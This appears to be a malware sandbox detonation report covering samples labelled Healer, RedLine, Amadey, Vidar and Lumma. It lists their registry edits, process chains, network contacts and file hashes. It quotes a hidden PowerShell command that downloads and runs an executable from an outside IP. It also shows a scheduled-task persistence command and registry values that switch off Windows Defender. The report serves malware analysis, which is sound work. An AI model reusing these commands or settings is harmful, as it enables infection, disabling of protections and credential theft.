SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 9267891b746e1293c1db6d863760ab97
SHA1 2a3127e67b9fa12aae0208f9c2a7f2621a703e6c
SHA256 904af23b3b22aa3ccdb8adcec50275b39a247dcd43392acd28b5f4590259dc39
SHA512 b962f39f7b86b3d83dbfc9f7c287c746b61a09ac1c9c32a2746d7829cf7687c80ef65111a89762bf961af573dbde16c3b614351d1e3004e6e89c8fc24c0eb92a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 0eb92d7fc4cc6e26f79d25b61631feb4
SHA1 957dea426f86179728503af52ebb35d82249b4a5
SHA256 733e7b9e759012d667a7bde829661c20cf37a73ddaecc404ce910e3eeea45731
SHA512 36e9fdbe415afa1ed3af270d007c3a28bfbbc1379a29f50e26339f72e6eafd547a933d209543c32b75fe3d3340452dfafe82ba497c21c818c34b8d4e9ee70bc8

Analysis: behavioral25

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win7-20240903-en

Max time kernel

117s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe"

Signatures

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Healer family

healer

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2676 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\cmd.exe
PID 2676 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\cmd.exe
PID 2676 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\cmd.exe
PID 2676 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\cmd.exe
PID 2676 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\mshta.exe
PID 2676 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\mshta.exe
PID 2676 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\mshta.exe
PID 2676 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\mshta.exe
PID 1232 wrote to memory of 2692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1232 wrote to memory of 2692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1232 wrote to memory of 2692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1232 wrote to memory of 2692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2724 wrote to memory of 2804 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2724 wrote to memory of 2804 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2724 wrote to memory of 2804 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2724 wrote to memory of 2804 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2804 wrote to memory of 1608 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE
PID 2804 wrote to memory of 1608 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE
PID 2804 wrote to memory of 1608 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE
PID 2804 wrote to memory of 1608 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn mxT1RmaX9Cr /tr "mshta C:\Users\Admin\AppData\Local\Temp\9T4YEFyEF.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\9T4YEFyEF.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn mxT1RmaX9Cr /tr "mshta C:\Users\Admin\AppData\Local\Temp\9T4YEFyEF.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'J4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE

"C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE"

Network

Country Destination Domain Proto
RU 185.215.113.16:80 185.215.113.16 tcp

Files

C:\Users\Admin\AppData\Local\Temp\9T4YEFyEF.hta

MD5 f0c99a072b3a41e0b07a63772514614a
SHA1 4149662f98408f25a9726b53bdd16325449f6316
SHA256 e7cf79e512a9b32c95a626735b09937a6456c1550f0ad39498487543c91116dd
SHA512 6b0efa113e09f10db718b7f3570920e551bb2c7442e239c00ebf29e601a4abe89ead41860467d823a0b0d0c998c8aacfc6e3a8af994a98d6c0375d77d05128c3

\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE

MD5 03a574d64f0e62c5e117a5f5acf137e4
SHA1 93ba2b5bdac91342c9eeaeaf3e44cc1793ee6d90
SHA256 dcc540b3c86a167bb0cf71e8d4598f7566fe0f625d64ffe7a37f0d5f502be747
SHA512 d1b76d82c522ccb157dcd5155011619b36baf3516cf08cb6bc98fb9bc009230e5c53d77f5d8adc0e85dde678b4b3542823919ee6490533df8250078caca1b9b1

memory/2804-8-0x0000000006580000-0x00000000069D2000-memory.dmp

memory/2804-13-0x0000000006580000-0x00000000069D2000-memory.dmp

memory/1608-15-0x0000000000B10000-0x0000000000F62000-memory.dmp

memory/1608-16-0x0000000000B10000-0x0000000000F62000-memory.dmp

memory/1608-17-0x0000000000B10000-0x0000000000F62000-memory.dmp

memory/1608-20-0x0000000000B10000-0x0000000000F62000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win10v2004-20250217-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
GB 45.155.103.183:1488 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

memory/428-0-0x0000016B0DF00000-0x0000016B0E000000-memory.dmp

memory/428-1-0x00007FFD4D593000-0x00007FFD4D595000-memory.dmp

memory/428-2-0x0000016B0F920000-0x0000016B0F972000-memory.dmp

memory/428-3-0x00007FFD4D590000-0x00007FFD4E051000-memory.dmp

memory/428-4-0x00007FFD4D590000-0x00007FFD4E051000-memory.dmp

memory/428-5-0x00007FF680700000-0x00007FF6808AE000-memory.dmp

memory/428-6-0x0000016B290D0000-0x0000016B291DA000-memory.dmp

memory/428-7-0x0000016B281C0000-0x0000016B281D2000-memory.dmp

memory/428-8-0x0000016B28EE0000-0x0000016B28F1C000-memory.dmp

memory/428-9-0x0000016B28F70000-0x0000016B28FC0000-memory.dmp

memory/428-10-0x0000016B0DF00000-0x0000016B0E000000-memory.dmp

memory/428-11-0x0000016B294D0000-0x0000016B29692000-memory.dmp

memory/428-12-0x0000016B2A4E0000-0x0000016B2AA08000-memory.dmp

memory/428-13-0x00007FFD4D593000-0x00007FFD4D595000-memory.dmp

memory/428-14-0x00007FFD4D590000-0x00007FFD4E051000-memory.dmp

memory/428-15-0x00007FFD4D590000-0x00007FFD4E051000-memory.dmp

memory/428-17-0x00007FFD4D590000-0x00007FFD4E051000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win7-20240903-en

Max time kernel

119s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"

Signatures

Reads user/profile data of local email clients

spyware stealer

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1980 set thread context of 2956 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 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 C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1980 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 1980 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 1980 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 1980 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 1980 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 1980 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 1980 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 1980 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 1980 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 1980 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 1980 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 1980 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 1980 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 1980 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 1980 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Windows\SysWOW64\WerFault.exe
PID 1980 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Windows\SysWOW64\WerFault.exe
PID 1980 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Windows\SysWOW64\WerFault.exe
PID 1980 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1980 -s 508

Network

Country Destination Domain Proto
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 foresctwhispers.top udp
US 104.21.48.1:443 foresctwhispers.top tcp
US 8.8.8.8:53 tracnquilforest.life udp
US 104.21.74.230:443 tracnquilforest.life tcp
US 8.8.8.8:53 presentymusse.world udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 boltetuurked.digital udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 disobilittyhell.live udp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp

Files

memory/1980-0-0x0000000074BEE000-0x0000000074BEF000-memory.dmp

memory/1980-1-0x0000000000890000-0x00000000008F8000-memory.dmp

memory/2956-3-0x0000000000400000-0x000000000045E000-memory.dmp

memory/2956-14-0x0000000000400000-0x000000000045E000-memory.dmp

memory/2956-5-0x0000000000400000-0x000000000045E000-memory.dmp

memory/2956-12-0x0000000000400000-0x000000000045E000-memory.dmp

memory/2956-10-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2956-9-0x0000000000400000-0x000000000045E000-memory.dmp

memory/2956-8-0x0000000000400000-0x000000000045E000-memory.dmp

memory/2956-7-0x0000000000400000-0x000000000045E000-memory.dmp

memory/1980-15-0x0000000074BE0000-0x00000000752CE000-memory.dmp

memory/2956-16-0x0000000000400000-0x000000000045E000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\Local\Temp\TarF35B.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

memory/2956-54-0x0000000000400000-0x000000000045E000-memory.dmp

memory/1980-55-0x0000000074BE0000-0x00000000752CE000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win7-20240903-en

Max time kernel

150s

Max time network

151s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
